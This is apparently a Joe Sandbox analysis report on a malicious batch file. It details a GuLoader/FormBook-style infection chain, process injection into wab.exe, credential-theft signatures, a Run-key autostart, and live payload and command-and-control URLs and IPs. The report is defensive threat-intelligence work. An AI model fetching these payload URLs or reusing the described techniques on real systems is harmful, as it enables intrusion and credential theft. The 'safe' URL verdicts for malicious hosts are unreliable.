started        30 conhost.exe 21->30         started        32 cmd.exe 1 21->32         started        signatures8 process9 signatures10 88 Writes to foreign memory regions 27->88 90 Found suspicious powershell code related to unpacking or dynamic code loading 27->90 34 wab.exe 6 27->34         started        38 cmd.exe 1 27->38         started        40 wab.exe 27->40         started        process11 dnsIp12 62 tejarat-gram.com 185.83.114.124, 443, 49712 HOSTIRAN-NETWORKIR Iran (ISLAMIC Republic Of) 34->62 76 Maps a DLL or memory area into another process 34->76 42 nPzDKsDmTWqJ.exe 34->42 injected signatures13 process14 signatures15 86 Found direct / indirect Syscall (likely to bypass EDR) 42->86 45 clip.exe 1 13 42->45         started        process16 signatures17 98 Tries to steal Mail credentials (via file / registry access) 45->98 100 Tries to harvest and steal browser information (history, passwords, etc) 45->100 102 Maps a DLL or memory area into another process 45->102 104 2 other signatures 45->104 48 nPzDKsDmTWqJ.exe 45->48 injected 52 firefox.exe 45->52         started        process18 dnsIp19 54 www.387mfyr.sbs 137.220.252.40, 49714, 80 BCPL-SGBGPNETGlobalASNSG Singapore 48->54 66 Found direct / indirect Syscall (likely to bypass EDR) 48->66 signatures20

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          rFV-452747284IN.bat3%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://contoso.com/License0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://econstramedia.com/Tegl0%Avira URL Cloudsafe
          https://aka.ms/pscore680%URL Reputationsafe
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.bin0%Avira URL Cloudsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://econstramedia.com/0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderier.s0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://tejarat-gram.com/0%Avira URL Cloudsafe
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binO0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnder0%Avira URL Cloudsafe
          http://econstramedia.com0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnd0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderier.snpXR0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderier0%Avira URL Cloudsafe
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binnJ0%Avira URL Cloudsafe
          https://go.mic0%Avira URL Cloudsafe
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binRhypsPosvilla-ventura.com/cyoeNvCnByBgIccf106.bin0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderier.0%Avira URL Cloudsafe
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binq0%Avira URL Cloudsafe
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binU0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnde0%Avira URL Cloudsafe
          https://econstramedia.com/Teglb0%Avira URL Cloudsafe
          https://econstramedia.com/Teg0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrn0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderier.sn0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderie0%Avira URL Cloudsafe
          https://econstramedia.co0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderi0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbr0%Avira URL Cloudsafe
          http://www.387mfyr.sbs/abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh0%Avira URL Cloudsafe
          https://econstramedia.c0%Avira URL Cloudsafe
          https://econstramedia.com/T0%Avira URL Cloudsafe
          https://econstramedia.com0%Avira URL Cloudsafe
          https://econstramedia.com/Te0%Avira URL Cloudsafe
          https://econstramedia.com/Teglbrnderier.snp0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.387mfyr.sbs
          		137.220.252.40
          		truefalse
            		unknown
            tejarat-gram.com
            		185.83.114.124
            		truefalse
              		unknown
              econstramedia.com
              		103.211.216.55
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://tejarat-gram.com/cyoeNvCnByBgIccf106.binfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.387mfyr.sbs/abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxhfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglbrnderier.snpfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabclip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderier.spowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://tejarat-gram.com/wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://tejarat-gram.com/cyoeNvCnByBgIccf106.binOwab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://econstramedia.compowershell.exe, 00000002.00000002.2676908223.000001B101E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderier.snpXRpowershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrndpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://tejarat-gram.com/cyoeNvCnByBgIccf106.binnJwab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://go.micpowershell.exe, 00000006.00000002.2603068995.0000000006D19000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderierpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://go.micropowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderier.powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://tejarat-gram.com/cyoeNvCnByBgIccf106.binqwab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://tejarat-gram.com/cyoeNvCnByBgIccf106.binRhypsPosvilla-ventura.com/cyoeNvCnByBgIccf106.binwab.exe, 0000000A.00000002.2803162062.00000000056D0000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://tejarat-gram.com/cyoeNvCnByBgIccf106.binUwab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglbrndepowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglbpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglbrnderier.snpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Tegpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderiepowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.copowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglbrnpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Teglbrpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Teglbrnderipowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.cpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.compowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B100477000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B101D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Tpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Tepowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.83.114.124
                		tejarat-gram.comIran (ISLAMIC Republic Of)
                		59441HOSTIRAN-NETWORKIRfalse
                137.220.252.40
                		www.387mfyr.sbsSingapore
                		64050BCPL-SGBGPNETGlobalASNSGfalse
                103.211.216.55
                		econstramedia.comSeychelles
                		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1471448
                Start date and time:2024-07-11 13:11:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rFV-452747284IN.bat
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winBAT@22/10@3/3
                EGA Information:
                • Successful, ratio: 40%
                HCA Information:
                • Successful, ratio: 84%
                • Number of executed functions: 99
                • Number of non-executed functions: 306
                Cookbook Comments:
                • Found application associated with file extension: .bat

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target nPzDKsDmTWqJ.exe, PID 6192 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 4324 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: rFV-452747284IN.bat

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:11:59API Interceptor128x Sleep call for process: powershell.exe modified
                13:13:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FLY4H C:\Program Files (x86)\windows mail\wab.exe
                13:13:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FLY4H C:\Program Files (x86)\windows mail\wab.exe

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                137.220.252.40ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                • www.387mfyr.sbs/8cgp/
                Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.387mfyr.sbs/wu8v/
                NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                • www.387mfyr.sbs/wu8v/
                SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                • www.387mfyr.sbs/wu8v/
                COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.387mfyr.sbs/wu8v/
                BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • www.387mfyr.sbs/8cgp/
                103.211.216.55Drawing.exeGet hashmaliciousFormBookBrowse
                • www.geetamalhotra.com/dq6e/?4h6ptXe=gCmk4CY41YBRNzkMIgpxHLDcJO/SeUa6sXhnC1aM++ZU7dPip1JMqQzcDB9b/rk3DAuPkc/TTQ==&w2=JBZ8
                SOA #093732.exeGet hashmaliciousFormBookBrowse
                • www.skyrosceramic.com/hme1/?jPw=XbK6B4uri6OvF71KFs1AoR4G+KEYZc4e7kHOoPVYJEZl8k4bIJ+n3z//pieZBY82GR+z&y2JhS=6lr41hZpgNXtF
                documents-2112491607.xlsmGet hashmaliciousHidden Macro 4.0Browse
                • kullumanalitours.com/ds/index.html
                documents-1660683173.xlsmGet hashmaliciousHidden Macro 4.0Browse
                • kullumanalitours.com/ds/index.html

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                econstramedia.comBL1+2 DRAFT.cmdGet hashmaliciousFormBook, GuLoaderBrowse
                • 103.211.216.55
                BL1+2 DRAFT.cmdGet hashmaliciousGuLoaderBrowse
                • 103.211.216.55
                BL1+2DRAFT .cmdGet hashmaliciousFormBook, GuLoaderBrowse
                • 103.211.216.55
                www.387mfyr.sbsPAGO M-R4535555397585634646347575473462634652356426267547533.batGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                Dokument o nacrtu pla#U0107anja RAIFFEISENMolehill45636346783462357.batGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                PO SIMTOSS ATTROCENAPEE 20MT Augamentico77.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                iggliest.batGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                IMG-WAA46573758 Offerte Aanvraag Debitrix.batGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                SMTECHMC U#U010ditavanje informacija Genvordighederne.batGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                Novi Narud#U017eba MT-ISF5355353Modstandsbevgelsens.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                • 137.220.252.40
                IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40
                MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                • 137.220.252.40
                Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 137.220.252.40

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                PUBLIC-DOMAIN-REGISTRYUSz2PKRSEkM9edbE7Om.exeGet hashmaliciousAgentTeslaBrowse
                • 208.91.199.223
                BL1+2 DRAFT.cmdGet hashmaliciousFormBook, GuLoaderBrowse
                • 103.211.216.55
                https://chemindigest.com/mnre-amends-guidelines-for-procurement-of-green-ammonia-production/Get hashmaliciousUnknownBrowse
                • 103.76.228.14
                ATTACHMENT OF PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                • 208.91.199.225
                BL1+2 DRAFT.cmdGet hashmaliciousGuLoaderBrowse
                • 103.211.216.55
                BL1+2DRAFT .cmdGet hashmaliciousFormBook, GuLoaderBrowse
                • 103.211.216.55
                PO-020716-WA0002.pdf..exeGet hashmaliciousAgentTeslaBrowse
                • 208.91.199.224
                https://ausservi.com/Get hashmaliciousUnknownBrowse
                • 162.215.252.49
                SOA-Al Daleel.exeGet hashmaliciousAgentTeslaBrowse
                • 208.91.199.224
                Luciana Alvarez CV.exeGet hashmaliciousAgentTeslaBrowse
                • 208.91.199.225
                HOSTIRAN-NETWORKIRShipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 5.144.130.49
                PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 5.144.130.49
                PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 5.144.130.49
                PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 5.144.130.35
                Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 5.144.130.35
                https://hamrahansystem.com/4xe3cx/?PliaTEYmfRshGet hashmaliciousUnknownBrowse
                • 45.138.134.33
                Saham_Man.apkGet hashmaliciousIRATABrowse
                • 5.144.130.58
                Invoice-AWB-Document.doc.exeGet hashmaliciousAgentTeslaBrowse
                • 5.144.130.32
                https://wro16kdfl.lavinphysio.com/?qp=c2FuYWJyaWF0QGhpbGxzYm9yb3VnaGNvdW50eS5vcmc=Get hashmaliciousUnknownBrowse
                • 5.144.130.49
                http://www.checkpointmarketing.net/newsletter/linkShim.cfm?key=362983194G2589J6588285N9N118124&link=https://aqvpaxxbr.lavinphysio.com/?qp=dGFtaUBnaGVlbmlycmlnYXRpb24uY29tGet hashmaliciousHTMLPhisherBrowse
                • 5.144.130.49
                BCPL-SGBGPNETGlobalASNSGHSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                • 118.107.47.224
                j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                • 118.107.47.224
                DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                • 118.107.47.224
                Inquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                • 134.122.138.60
                DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                • 118.107.47.224
                tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
                • 216.83.55.173
                DVh7O0cBNN.elfGet hashmaliciousUnknownBrowse
                • 182.54.144.4
                RFQ - MK FMHS.RFQ.24.101.exeGet hashmaliciousFormBookBrowse
                • 202.95.21.152
                hOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 14.128.41.165
                998_popxinv_Installer.exeGet hashmaliciousXWormBrowse
                • 134.122.174.169

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0ez1EmployeeSalaryScale.exeGet hashmaliciousAgentTeslaBrowse
                • 103.211.216.55
                z2PKRSEkM9edbE7Om.exeGet hashmaliciousAgentTeslaBrowse
                • 103.211.216.55
                https://thelifecorner.aeGet hashmaliciousUnknownBrowse
                • 103.211.216.55
                rPURCHASEORDERPO-399.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 103.211.216.55
                http://www.iononrischio.it/download/scheda_maremoto_2017_ENG.pdfGet hashmaliciousUnknownBrowse
                • 103.211.216.55
                https://in.xero.com/6eN6nIhVjZ5TFcSo42CWLydXgmFJsTp4RnqwBepM?utm_source=invoiceEmailViewInvoiceUrlGet hashmaliciousUnknownBrowse
                • 103.211.216.55
                SecuriteInfo.com.Trojan.AutoIt.1410.15666.9038.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 103.211.216.55
                https://streamlinesolution1-my.sharepoint.com/:o:/g/personal/waltervreijsen_streamlinelogistics_nl/EvNJliVQNWtInEJ3BC_G6bAB3_Xrjwh4ftVSYmFbrooNWA?e=cO00z9Get hashmaliciousUnknownBrowse
                • 103.211.216.55
                BL1+2 DRAFT.cmdGet hashmaliciousFormBook, GuLoaderBrowse
                • 103.211.216.55
                8376320938367312.exeGet hashmaliciousGuLoaderBrowse
                • 103.211.216.55
                37f463bf4616ecd445d4a1937da06e19rSWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 185.83.114.124
                rNuevalistadepedidos.exeGet hashmaliciousFormBookBrowse
                • 185.83.114.124
                BL1+2 DRAFT.cmdGet hashmaliciousFormBook, GuLoaderBrowse
                • 185.83.114.124
                8376320938367312.exeGet hashmaliciousGuLoaderBrowse
                • 185.83.114.124
                8BoeFOfNMo.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 185.83.114.124
                RFQ20240711_Commerical List_pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • 185.83.114.124
                SecuriteInfo.com.FileRepMalware.27918.11216.exeGet hashmaliciousUnknownBrowse
                • 185.83.114.124
                file.exeGet hashmaliciousVidarBrowse
                • 185.83.114.124
                rC1JYAnNNn.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 185.83.114.124
                I3AAOUFA1w.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 185.83.114.124

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

